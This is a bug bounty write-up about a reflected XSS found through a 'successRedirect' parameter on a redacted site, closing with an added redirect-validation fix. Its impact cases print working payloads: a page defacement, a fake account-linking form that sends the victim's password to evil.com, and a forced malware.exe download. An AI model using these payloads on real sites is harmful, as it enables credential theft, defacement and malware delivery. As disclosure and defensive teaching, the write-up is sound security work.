Hi fellow hunters, in this write-up, I will explain how I found a reflected cross-site scripting bug and showed multiple attack scenarios.
The target I was testing was an old public program; I will refer to it as www.redacted.com throughout this blog, so let's get started.
Finding Reflected XSS
I found a unique subdomain by performing vertical and horizontal subdomain enumeration. I have created my own bash script for subdomain enumeration, which is based on the above methodology.
Check out this blog for subdomain enumeration.
https://sidxparab.gitbook.io/subdomain-enumeration-guide/types/horizontal-enumeration
The unique subdomain was accounts.example-website-test02.redacted.com. When I tried to visit this subdomain, it redirected me to the main domain www.redacted.com/login, so I decided to fuzz the directories with ffuf.
After fuzzing, I got an endpoint named launcher, on which there was a JS file with numerous hidden endpoints.
In the JS file I found an endpoint named LinkPsn, on which I did recursive fuzzing and got one more endpoint named conflict. There was a page containing a continue button, where I performed parameter fuzzing and found the successRedirect parameter, which was vulnerable: after clicking the continue button, an alert pops up.
I immediately reported this and my report was triaged, but here is a twist!
A staff member changed the severity to low and gave a $500 bounty. I was shocked, because for a Low bug they were offering $500 and for a Medium they were offering $2000.
Staff Members Response
This is a reflected XSS, this means that the only way to achieve something out of it is through phishing or something of the sorts. For this reason we decided to decrease the severity of this issue.
The Reflected XSS comes under the Severity Medium (4 ~ 6.9)
So I decided to show the impact by creating multiple use cases with the help of my friend Saad Ahmed.
There are various means by which an attacker might induce a victim user to make a request that they control, to deliver a reflected XSS attack. These include placing links on a website controlled by the attacker, or on another website that allows content to be generated, or by sending a link in an email, tweet, or another message. The attack could be targeted directly against a known user or could be an indiscriminate attack against any users of the application.
Below are the different cases in which I have tried my best to show the impact of this Reflected XSS. There is much more we can do using the reflected XSS, like controlling the victim's browser by sending him the BeEF-hooked URL using the reflected XSS.
Case 1 : DEFACE
Payload:
javascript:document.getElementsByTagName(%60body%60)%5B0%5D.innerHTML=%60%3Ch1%3Ehacked%3C/h1%3E%60//
Case 2 : Stealing the Victim's Password and Sending It to the Attacker's Server
Payload :
javascript:document.getElementsByTagName(`body`)[0].innerHTML%20=%20`%3Cb%3ELink%20PlayStation%20Network%20Account%3C/b%3E%3C/br%3E%3C/br%3EVerify%20Your%20Password:%3Cinput%20type=%22password%22%20id=%22pwd%22%3E%3Cinput%20type=%22submit%22%20value=%22Link%20Account%22%20onclick=alert(document.getElementById(%22pwd%22).value)%3E`//
javascript:document.getElementsByTagName(`body`)[0].innerHTML = `<b>Link PlayStation Network Account</b></br></br>Verify Your Password:<input type="password" id="pwd"><input type="submit" value="Link Account" onclick=window.location.href="//evil.com?pwd="%2bdocument.getElementById("pwd").value>`//
Case 3 : Download Malware On Victim Computer
Payload :
javascript:window.location.href="https://thefiletree.com/app/conf/malware.exe"
Case 4 : Controlled DOM
Payload :
javascript:var all = document.getElementsByTagName("*");for (var i=0, max=all.length; i < max; i++) {alert(all[i])}//
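All four payloads above depend on successRedirect accepting a javascript: URL, and Case 2 also uses a protocol-relative //host target. As an added example (not code from the program or from the original write-up), here is one way an application could validate such a parameter before using it; the function name, origin allowlist and fallback are assumptions.

```javascript
// Added example: validate a redirect parameter such as successRedirect.
// APP_ORIGIN, ALLOWED_ORIGINS, FALLBACK and safeRedirectTarget are assumed names.
const APP_ORIGIN = "https://www.redacted.com";      // placeholder used in the write-up
const ALLOWED_ORIGINS = new Set([APP_ORIGIN]);      // assumed allowlist
const FALLBACK = APP_ORIGIN + "/";                  // used whenever input is rejected

function safeRedirectTarget(raw) {
  if (typeof raw !== "string" || raw.length > 2048) return FALLBACK;
  let url;
  try {
    // Parse the way a browser does: leading spaces are dropped, tabs and
    // newlines are removed, the scheme is lowercased and "\" acts like "/".
    // A string filter for "javascript:" misses those variants; the parser does not.
    url = new URL(raw, APP_ORIGIN);
  } catch {
    return FALLBACK;
  }
  // Scheme allowlist: rejects javascript:, data:, vbscript:, http:, ...
  if (url.protocol !== "https:") return FALLBACK;
  // Origin allowlist: rejects //other-host, https://other-host and
  // https://www.redacted.com@other-host (userinfo trick).
  if (!ALLOWED_ORIGINS.has(url.origin)) return FALLBACK;
  if (url.username !== "" || url.password !== "") return FALLBACK;
  // Return the absolute form so a path like "//host" cannot be re-read
  // later as a protocol-relative URL.
  return url.href;
}

// Constructed sample inputs, shaped like the payloads in the cases above.
const samples = [
  "/account/linked?ok=1",
  "javascript:alert(1)//",
  " JaVa\tScRiPt:alert(1)",
  "//evil.example/?pwd=x",
  "\\\\evil.example/",
  "https://www.redacted.com@evil.example/",
];
for (const s of samples) {
  console.log(JSON.stringify(s), "->", safeRedirectTarget(s));
}
```

The check belongs wherever the parameter is turned into a link or location, and the returned value still needs normal output encoding when it is written into HTML.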
Final Note
Thank you very much for your attention and I wish you good luck in finding as many bugs as possible and getting big rewards!